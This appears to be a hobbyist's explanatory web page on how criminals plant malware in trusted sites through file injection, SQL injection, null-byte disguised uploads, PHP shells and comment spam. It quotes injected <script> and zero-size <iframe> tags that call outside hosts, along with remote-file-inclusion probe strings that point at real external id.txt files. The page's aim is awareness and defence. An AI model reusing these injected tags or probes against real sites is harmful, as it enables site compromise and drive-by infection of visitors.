NB undergoing changes

The malware is many variations of things:

• .exe files / activeX
• Downloader which installs 'fakeware', see eks. this picture
• Realplayer exploit
• Flash exploit
• Quickviewer exploit
• And many more exploits...

The files can be placed by using FTP,SSH, vulnerable HTML upload etc. But I have also seen malware hosted in a photogallery. This is done by uploading the exe-file as a picture: filename.exe%00.jpg Notice the %00 part, which is a hexadecimal zero, terminating the string. Apart from direct upload, the criminals uses PHP code to place files. Examples are r57shell, namogofer. An example of a danish company, which were used as placeholder, is described in this article: http://www.version2.dk/artikel/7100

They can be difficult to investigate, since I have seen example of 'sties' which:

1. Activates fakes scanner
2. Next visit shows some kind of porn
3. Every visit after that shows an 404 Not found (but header is 200 OK)

This is probably done by changing rewriting rules in .htaccess Each 'instance' of the malware has its own directory - I stumbled upon a site where there was 400 directories, each containing various version of the malware. Some of the sites only contains various scripts to redirect to the endpoint. By using a separate site, the criminals adds an extra layer to layout a 'smoke trail'. I have put together som sceen shots of real malware in the wild here. Also a couple of reproduced playbacks, which is sources from the real world but with modified URI's to keep inside this domain.

By trusted sites, I mean publically trusted sites - Government, Companies etc. - sites that people really trust. The goal is to inject a simple piece of <script> or <iframe> which will be executed automatically when the user visits the site. It basically does nothing but loading the layer from fake/phishing sites. An example of script tag:

<script src=http://www.adwadb.mobi/ngg.js></script>

But not all users are affected all the time, here is a Javascript example from the wild:

n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){

Notice here, that only browsers with languagecode different from the above list will be affected. It may give some hint about the origin of the code. Another thing, that makes it difficult to find upfront: Some scripts, when loaded, points to msn.com in an <iframe>, and not the malware script from the phishing sites. Furthermode there is a counter, so the criminals can see how many potential tagets(users) there is active. When there is 'enough', simply replace the script to point at phishing/malware. If we say 1000 active targets, invokes them all by changing one single file. So the buildup process width redirecting to msn.com can go (undiscovered) on for days,weeks, maybe more, since msn.com has so many hits, that a thousand more or less doesnt raise an alert. Just a little notide: The malware coders are sometimes kind of arrogant, they use jacascript like this: var fuckAntivirus = something. But this layer is also used to launch DDoS attacks. See DDoS attacks There are several ways to inject the tags, but common is:

• Injection in Files. When the hacker has gained access to the server it is done by running a program, typically installed through remote code injection. These program traverses the directories under wwwroot, and inserts/appends the tags into every .php -, .htm -, .html - file, thereby inserting tags into every single page, and probably multiple instanses pr. page, since comments will be affected as well. The attacks on Wordpress, Mambo server etc. by executing remote PHP scripts should be pretty good examples. It can also be other programs, Perl scripts etc, or placed via FTP, SSH etc.
• SQL injection. Here the goal is to inject the <script> tags into the body text/links etc. in database driven sites, CMS - systems, shopping systems etc. Since the HTML is stored in the database fields, it will impact every page in the CMS. To see an example how SQL injection is done, take a look here There is an description and examples of how to construct methods to find it, and remove it. An example of a succesfull SQL injection in the wild (redirect users to phishing/malware): http://www.version2.dk/artikel/7958

On these systems, the posted content does not contain malware, or <script> tags. Typically, it is things like:

1. See (some celebrity nude) here
2. Look at this video with asian porn here
3. Buy viagra cheap here
4. Fantastic financial offer, look here

The links does not point to malware itself, but to intermidiate sites. (So the URL looks trustworthy) When the user click on the link, he will be redirected from the intermidiate site, over phishing site and eventually the malware. I have put together som sceen shots of real malware in the wild here. where the visual part came form phishing sites. Also a couple of reproduced playbacks, which is sources from the real world but with modified URI's to keep inside this domain. The playbacks shows the user experience when going through the process.

Dictionary attack against SSH are using common user/passwords. In the log files you can se attempts to logon as root,admin,john,jane etc. When using FTP, such as Filezilla, default user/password are installed. If you don't change theese, you are inviting to get infected. Execution of PHP code, is very common. Probes for vulnerability is done by sending references to code in the querystring, such as:

• mosConfig_absolute_path=http://www.visitesantacatarina.com.br/id.txt???
• keynav=1/inc/cmses/aedatingCMS.php?dir[inc]=http://www.shaker-diffusion.com/id.txt???
• keynav=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fcontent%2Fugi%2Fvipo%2F

The probes typically does nothing harmfull, but returns information about the system. See example Another example is the namogofer, which just does: echo md5("just_a_test") When receiving a positive response, it signals vulnerabolity.

It is done by inspecting the HTML for <form> tags with method="post", and simply POST'ing it with the links etc. The POST's are made according to the field name, so email will contain some kind of email address, message,comment contains links formed as <a href=.. or encapsulated in []. Another action is to use the link to intermidiate sites as referrer. When the webmaster sees it in his statistics, he might click the link, and might risk getting infected. Links to intermidiate can also be posted on Facebook, Twitter and other sites.

To hide the request for the users, it is defined with zero size as this example

<iframe src=http://the.DDoS.victim width=0 height=0 frameborder=0></iframe>

To inject on the trusted sites, there are two ways to do that. File injection. When the hacker has gained access to the server it is done by running a program. This program traverses the directory where the files are located, and inserts/appends the tags into every .php, .htm, .html, .asp file, thereby activating the intermidiate layer for every single page.